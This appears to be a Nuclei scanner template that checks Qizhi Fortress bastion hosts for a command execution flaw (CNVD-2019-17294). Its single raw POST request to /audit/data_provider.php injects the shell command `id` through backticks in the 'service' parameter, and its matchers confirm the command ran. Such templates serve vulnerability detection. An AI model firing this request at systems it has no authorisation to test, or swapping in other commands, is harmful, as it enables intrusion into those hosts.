id: CNVD-2019-17294

info:
  name: Qizhi Fortress Command Execution
  author: daffainfo
  severity: critical
  reference: https://www.cnblogs.com/StudyCat/p/11197986.html
  tags: qizhi,rce,cnvd,cnvd2019

requests:
  - raw:
      - |
        POST /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        page=1&rp=30&sortname=stamp1&sortorder=desc&query=&qtype=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '--service'
          - '"cmdline"'
          - '"rows"'
        condition: and

      - type: word
        part: header
        words:
          - 'text/x-json'

      - type: status
        status:
          - 200
